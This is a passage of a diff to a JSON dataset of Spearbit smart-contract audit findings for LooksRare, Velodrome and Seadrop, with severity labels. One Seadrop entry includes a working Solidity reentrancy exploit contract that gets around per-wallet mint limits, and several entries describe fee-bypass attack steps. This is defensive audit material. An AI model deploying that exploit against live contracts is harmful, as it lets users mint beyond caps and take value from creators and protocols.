Then if the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, ...], the return parameters would be (address(0), 0), and if it is [y, x, ...], the call would revert with BundleEIP2981NotAllowed(collection).", + "title": "Convert hardcoded route to internal function in CompoundOptimizer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "All of the hardcoded route setups can be converted to an internal function with hardcoded values.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Seller might get a lower fee than expected due to front-running", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "This protocol seems to have a fee structure where both the protocol and the original creator of the item are charging fees, and these fees are being subtracted from the seller's proceeds. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates.", + "title": "Early return in supplyAt save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "To save gas, the early return for the case where _epoch is equal to zero can be made before caching _point.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "StrategyManager does not emit an event when the first strategy gets added.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyManager does not emit an event when the first strategy gets added, which can cause issues for off-chain agents.", + "title": "Approved User could Split NFTs and be unable to continue operating", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "An approved user is set via approve; the storage value written is idToApprovals[_tokenId] = _approved; Splitting will create two new NFTs that will be sent to the owner. This means that an approved user would be able to split the NFTs on behalf of the owner; however, in doing so they would lose their rights over the new NFTs, being unable to continue using them during the TX.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "TransferSelectorNFT does not emit events when new transfer managers are added in its constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "TransferSelectorNFT does not emit an event when assetTypes of 0 and 1 are added in its constructor.", + "title": "Add sweep function to CompoundOptimizer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some tokens may be completely illiquid or may not be worth auto-compounding, so it would be best to also allow a way to sweep tokens out to the owner for some tokens. Examples: Airdrops / Extra rewards. 
Very new tokens that the owner wants to farm instead of dump.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.", + "title": "Allow Manual Suggestion of Pair in AutoCompounder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Allow manual suggestion of token pairs such as USDC, USDT, LUSD, and wBTC. It may be best to pass a list of pairs as parameters to check for additional tokens. Ultimately, if a suggested pair offers a better price, there's no reason not to allow it. The caller should be able to pass a suggested optimal route, which can then be compared against other routes. Use whichever route is best. If the user's suggested route is the best one, use theirs and ensure that the swap goes through.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "The returned price by strategies are not validated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a taker submits an order to be executed, the price returned by the maker's chosen strategy is not validated. The current strategies do have the validations implemented, but the general upper and lower bound price validation would need to be in the protocol contract itself, since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker. Related issue: \"price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed\"", + "title": "Check if owner exists in split function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In case the NFT does not exist, the _ownerOf(_from) function returns the zero address. This check is satisfied if canSplit has been toggled. However, this does not lead to any issues because the _isApprovedOrOwner() check will revert as intended, and there is no amount in the lock. It may be a good idea to update the _ownerOf() function to revert if there is no owner for the NFT.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Makers can sign (or be tricked into signing) collection of orders (using the merkle tree mechanism) that cannot be entirely canceled.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to trees with a high number of leaves such that the leaves each encode an order with different subsetNonce and orderNonce (this would require canceling each nonce individually if the relevant endpoints are used). 
askNonce or bidNonce that form a consecutive array of integers (1, ..., n) (this would require incrementing these nonces at least n times, if this method was used as a way of canceling the orders). To cancel these orders, the maker would need to call the cancelOrderNonces, cancelSubsetNonces, or incrementBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove its token approvals (if it's not a custom EIP-1271 maker/signer) and not use that address again to interact with the protocol.", + "title": "Velo and Veto Governor do not use MetaTX Context", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "These two contracts use Context instead of ERC2771Context.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "The ItemIdsRange strategy allows for length mismatch in itemIds and amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, then the transaction will revert anyway when it attempts to read an index out of bounds in the main loop. However, there is nothing causing a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction, e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this still could be an issue.", + "title": "SinkManager is depositing to Gauge without using the TokenId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "gauge.deposit allows specifying a tokenId, but the field is unused", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Informational" ] }, { - "title": "Spec mismatch - StrategyCollectionOffer allows only single item orders where the spec states it should allow any amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Proof only allows the transfer of a single ERC721/ERC1155 item, although the specification states it should support any amount.", + "title": "ERC721SeaDrop's modifier onlyOwnerOrAdministrator would allow either the owner or the admin to override the other person's config parameters.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The following 4 external functions in ERC721SeaDrop have the onlyOwnerOrAdministrator modifier, which allows either one to override the other person's work: updateAllowedSeaDrop updateAllowList updateDropURI updateSigner That means there should be some sort of off-chain trust established between these 2 entities. Otherwise, there are possible vectors of attack. 
Here is an example of how the owner can override AllowListData.merkleRoot and the other fields within AllowListData to generate proofs for any allowed SeaDrop's mintAllowList endpoint that would have MintParams.feeBps equal to 0: 1. The admin calls updateAllowList for an allowed SeaDrop implementation to set the Merkle root for this contract and emit the other parameters as logs (the SeaDrop endpoint being called by ERC721SeaDrop.updateAllowList: SeaDrop.sol#L827). 2. The owner calls updateAllowList but this time with new parameters, specifically a new Merkle root that is computed from leaves that have MintParams.feeBps == 0. 3. Users/minters use the generated proof corresponding to the latest allow list update and pass their mintParams.feeBps as 0, thus avoiding the protocol fee deduction for the creatorPaymentAddress (SeaDrop.sol#L187-L194).", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: High Risk" ] }, { - "title": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds after they have been added to LooksRareProtocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds for new collections after they have been added to LooksRareProtocol. It's also important to note that these strategy owners might not necessarily be the same owner as the LooksRareProtocol's. 1. LooksRareProtocol's OL adds strategy S. 2. Strategy's owner OS adds a malicious price feed for a new collection T.", + "title": "Reentrancy of fee payment can be used to circumvent max mints per wallet check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "In case of a mintPublic call, the function _checkMintQuantity checks whether the minter has exceeded the parameter maxMintsPerWallet, among other things. However, re-entrancy in the above fee dispersal mechanism can be used to circumvent the check. The following is an example contract that can be employed by the feeRecipient (assume that maxMintsPerWallet is 1): contract MaliciousRecipient { bool public startAttack; address public token; SeaDrop public seaDrop; fallback() external payable { if (startAttack) { startAttack = false; seaDrop.mintPublic{value: 1 ether}({ nftContract: token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); } } // Call `attack` with at least 2 ether. function attack(SeaDrop _seaDrop, address _token) external payable { token = _token; seaDrop = _seaDrop; startAttack = true; _seaDrop.mintPublic{value: 1 ether}({ nftContract: _token, feeRecipient: address(this), minterIfNotPayer: address(this), quantity: 1 }); token = address(0); seaDrop = SeaDrop(address(0)); } } This is especially bad when the parameter PublicDrop.restrictFeeRecipients is set to false, in which case anyone can circumvent the max mints check, making it a high severity issue. In the other case, only privileged users, i.e. those that are part of the _allowedFeeRecipients[nftContract] mapping, would be able to circumvent the check--lower severity due to needed privileged access. Also, creatorPaymentAddress can use re-entrancy to get around the same check. 
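As a sketch of one possible hardening (illustrative only, not necessarily SeaDrop's actual fix), the per-wallet mint accounting can be finalized before any external value transfer (checks-effects-interactions), and/or the mint entry points can be guarded with a simple mutex: abstract contract ReentrancyGuarded { uint256 private _lock = 1; modifier nonReentrant() { require(_lock == 1, \"REENTRANCY\"); _lock = 2; _; _lock = 1; } } Note that a per-contract lock alone would not stop the cross-contract variant described in the next finding, so performing the state updates before the fee transfers is the more robust part of the fix. 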
See SeaDrop.sol#L571.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: High Risk" ] }, { - "title": "The price calculation in StrategyDutchAuction can be more accurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyDutchAuction calculates the auction price as uint256 duration = makerAsk.endTime - makerAsk.startTime; uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration; uint256 elapsedTime = block.timestamp - makerAsk.startTime; price = startPrice - elapsedTime * decayPerSecond; One of the shortcomings of the above calculation is that division comes before multiplication, which can amplify the error due to division.", + "title": "Cross SeaDrop reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The contract that implements IERC721SeaDrop can work with multiple Seadrop implementations, for example, a Seadrop that accepts ETH as payment as well as another Seadrop contract that accepts USDC as payment at the same time. This introduces the risk of cross contract re-entrancy that can be used to circumvent the maxMintsPerWallet check. Here's an example of the attack: 1. Consider an ERC721 token that has two allowed SeaDrop, one that accepts ETH as payment and the other that accepts USDC as payment, both with public mints and restrictedFeeRecipients set to false. 2. Let maxMintPerWallet be 1 for both these cases. 3. A malicious fee receiver can now do the following: Call mintPublic for the Seadrop with ETH fees, which does the _checkMintQuantity check and transfers the fees in ETH to the receiver. The receiver now calls mintPublic for Seadrop with USDC fees, which does the _checkMintQuantity check that still passes. The mint succeeds in the Seadrop-USDC case. The mint succeeds in the Seadrop-ETH case. The minter has 2 NFTs even though it's capped at 1. Even if a re-entrancy lock is added in the SeaDrop, the same issue persists as it only enters each Seadrop contract once.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Incorrect isMakerBidValid logic in ItemIdsRange execution strategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corresponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeStrategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid.", + "title": "Lack of replay protection for mintAllowList and mintSigned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "For mintAllowList (merkle proofs) and mintSigned (signatures), there are no checks that prevent re-using the same signature or Merkle proof multiple times. This is indirectly enforced by the _checkMintQuantity function that checks the mint statistics using IERC721SeaDrop(nftContract).getMintStats(minter), reverting if the quantity exceeds maxMintsPerWallet. Replays can happen if a wallet does not claim all of maxMintsPerWallet in one transaction. For example, assume that maxMintsPerWallet is set to 2. 
A user can call mintSigned with a valid signature and quantity = 1 twice. Typically, contracts try to avoid any forms of signature replays, i.e., a signature can only be used once. This simplifies the security properties. In the current implementation of the ERC721Seadrop contract, we couldn't see a way to exploit replays to mint beyond what could be minted in a single initial transaction with the maximum value of quantity supplied. However, this relies on the contract correctly implementing IERC721SeaDrop.getMintStats.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Restructure struct definitions in OrderStructs in a more optimized format", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for StrategyItemIdsRange one can either: Relax the requirement that makerBid.amounts.length == 1 (be replaced by amounts and itemIds length to be equal to 2) by allowing an unused extra amount, or not use the makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the additionalParameters field. This might actually make more sense since, in the case of StrategyItemIdsRange, the itemIds and amounts carry information that deviates from what they are intended to be used for.", + "title": "The digest in SeaDrop.mintSigned is not calculated correctly according to EIP-712", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintParams in the calculation of the digest in mintSigned is of struct type, so we would need to calculate and use its hashStruct, not the actual variable on its own.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "if/else block in executeMultipleTakerBids can be simplified/optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else's body in the outer scope. // If atomic, it uses the executeTakerBid function, if not atomic, it uses a catch/revert pattern with external function if (isAtomic) { // Execute the transaction and add protocol fee totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); unchecked { ++i; } continue; } try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns ( uint256 protocolFeeAmount ) { totalProtocolFeeAmount += protocolFeeAmount; } catch {} unchecked { ++i; } testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%)) Overall gas change: -24 (-0.002%) LooksRare: Fixed in PR 323. Spearbit: Verified.", + "title": "ERC721A has mint caps that are not checked by ERC721SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "ERC721SeaDrop inherits from ERC721A, which packs balance, numberMinted, numberBurned, and an extra data chunk in 1 storage slot (64 bits per substorage) for every address. 
This would add an inherent cap of 2^64 - 1 to all these different fields. Currently, there is no check in ERC721A's _mint for quantity nor in ERC721SeaDrop's mintSeaDrop function. Also, if we almost reach the max cap for a balance by an owner and someone else transfers a token to this owner, there would be an overflow for the balance and possibly the number of mints in the _packedAddressData. The overflow could possibly reduce the balance and the numberMinted to a way lower number and numberBurned to a way higher number.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Cache currency in executeTakerAsk and executeTakerBid", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "currency is read multiple times from calldata in executeTakerAsk and executeTakerBid.", + "title": "ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then, after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to zero or another number, and also call updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "Cache operators[i] in grantApprovals and revokeApprovals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "operators[i] is used 3 times in grantApprovals's for loop (and twice in revokeApprovals's).", + "title": "ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "When an owner of an ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after). Forgetting to set this parameter results in not receiving the protocol fees.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "recipients[0] is never used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "recipients[0] is set to protocolFeeRecipient, but its value is never used afterward. In payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate if any and the protocolFeeRecipient.", + "title": "owner can reset feeBps set by admin for token gated drops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Only the admin can call updateTokenGatedDropFee to update feeBps. 
However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata dropStage) twice after that to reset the feeBps to 0 for a drop. 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would retrieve the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to the updatePublicDrop and updatePublicDropFee pair, since updatePublicDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps, that value remains for this ERC721SeaDrop contract-related storage on SeaDrop (_publicDrops[msg.sender] = publicDrop), and any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Medium Risk" ] }, { - "title": "currency validation can be optimized/refactored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above we are enforcing only native tokens or WETH to be supplied. The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrategyChainlinkPriceLatency): if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } }", + "title": "Update the start token id for ERC721SeaDrop to 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "ERC721SeaDrop's mintSeaDrop uses _mint from the ERC721A library, which starts the token ids for minting from 0. /// contracts/ERC721A.sol#L154-L156 /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "validating amount can be simplified and possibly refactored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above, we are trying to invalidate orders that have 0 amounts or an amount other than 1 when the asset is an ERC721: if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } The above snippet can be simplified into: if (amount == 0 || (amount != 1 && assetType == 0)) { revert OrderInvalid(); }", + "title": "Update the ERC721A library due to an unpadded toString() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a, which does not add a trailing zero padding to the returned string. 
Some projects have had issues reusing the toString() where the off-chain call returned some dirty-bits at the end (similar to Seaport 1.0's name()).", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "_verifyMatchingItemIdsAndAmountsAndPrice can be further optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is necessary. Also, the whole function can be turned into an assembly block to further optimize this function. Examples of simplifications for if conditions: or(X, gt(Y, 0)) -> or(X, Y) // simplified version or(X, iszero(eq(Y,Z))) -> or(X, xor(Y, Z)) // simplified version The nested if block below if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } can be simplified into if (amount == 0) { revert OrderInvalid(); } if ((amount != 1) && (assetType == 0)) { revert OrderInvalid(); }", + "title": "Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There are no checks in Seadrop that prevent minting for the case when quantity == 0. This would call the function mintSeadrop(minter, quantity) for a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0--the correct behaviour. However, there have been instances in the past where ignoring quantity == 0 checks has led to security issues.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "In StrategyFloorFromChainlink premium amounts miss the related checks when compared to checks for discount amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "For discount amounts, StrategyFloorFromChainlink has custom checks for the underflows (even though they will be caught by the compiler): if (floorPrice <= discountAmount) { revert DiscountGreaterThanFloorPrice(); } uint256 desiredPrice = floorPrice - discountAmount; ... 
// @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; Similar checks for overflows for the premium are missing in the execution and validation endpoints (even though they will be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow).", + "title": "Missing parameter in _SIGNED_MINT_TYPEHASH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "A parameter is missing (uint256 maxTokenSupplyForStage) and got caught after reformatting.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink's isMakerBidValid compare the time dependent floorPrice to a fixed discount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When isMakerBidValid gets called, depending on the market conditions at that specific time, the comparisons between the floorPrice and the discount might cause this function to either return isValid as true or false.", + "title": "Missing address(0) check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "All update functions having an address as an argument check them against address(0). This is missing in updateTokenGatedDrop. This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value (SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968).", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, the maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert: makerAsk.additionalParameters = abi.encode(premium); isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. 
For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root.", + "title": "Missing boundary checks on feeBps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There's a missing check when setting feeBps from ERC721SeaDrop.sol, while one exists when the value is used at a later stage in Seadrop.sol, which could cause an InvalidFeeBps error.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink strategies do not check for asset types explicitly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyFloorFromChainlink has 4 different execution endpoints: executeFixedPremiumStrategyWithTakerBid executeBasisPointsPremiumStrategyWithTakerBid executeFixedDiscountCollectionOfferStrategyWithTakerAsk executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk All these endpoints require only one amount to be passed (asked for or bid on) and that amount would need to be 1. This is in contrast to the StrategyCollectionOffer strategy that allows an arbitrary amount (although also required to be only one amount). Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/data-feeds/nft-floor-price/addresses So, if there are no price feeds for ERC1155 (as of now), the transaction would revert. Thus implicitly one can deduce that the chainlink floor strategies are only implemented for ERC721 tokens. Other strategies condition the amounts based on the assetType: assetType == 0 or ERC721 collections can only have 1 as a valid amount; assetType == 1 or ERC1155 collections can only have a non-zero number as a valid amount. If in the future chainlink or another token-price-feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1.", + "title": "Upgrade openzeppelin/contracts's version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability as ECDSA.recover is used.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Low Risk" ] }, { "title": "struct TokenGatedDropStage is expected to fit into 1 storage slot", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", "body": "struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check.", "labels": [ "Spearbit", "Seadrop", "Severity: Low Risk" ] }, { "title": "Avoid expensive iterations on removal of list elements by providing the index of element to be removed", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", "body": "Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters to avoid looping over all elements. Also note, in the case of _removeFromEnumeration(signer, enumeratedStorage), hopefully there wouldn't be too many signers corresponding to a contract, so practically this wouldn't be an issue. But something to note: the owner or admin can stuff the signer list with a lot of signers, as the other person would not be able to remove from the list (DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them.", "labels": [ "Spearbit", "Seadrop", "Severity: Gas Optimization" ] }, { - "title": "itemIds and amounts are redundant fields for takerXxx struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. 
Most implemented strategies (which are fixed/chosen by the maker through signing the makerXxx which includes the strategyId) require the itemIds and amounts fields for the maker and the taker to mirror each other. M_i^j: the j-th element of maker's itemIds field (the struct would be either MakerBid or MakerAsk depending on the context). M_a^j: the j-th element of maker's amounts field (the struct would be either MakerBid or MakerAsk depending on the context). T_i^j: the j-th element of taker's itemIds field (the struct would be either TakerBid or TakerAsk depending on the context). T_a^j: the j-th element of taker's amounts field (the struct would be either TakerBid or TakerAsk depending on the context). Borrowing notations also from: \"Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies\". InheritedStrategy: T_i^j = M_i^j, T_a^j = M_a^j. StrategyDutchAuction: T_i^j = M_i^j, T_a^j = M_a^j, taker can send extra itemIds and amounts but they won't be used. StrategyUSDDynamicAsk: T_i^j = M_i^j, T_a^j = M_a^j, taker can send extra itemIds and amounts but they won't be used. 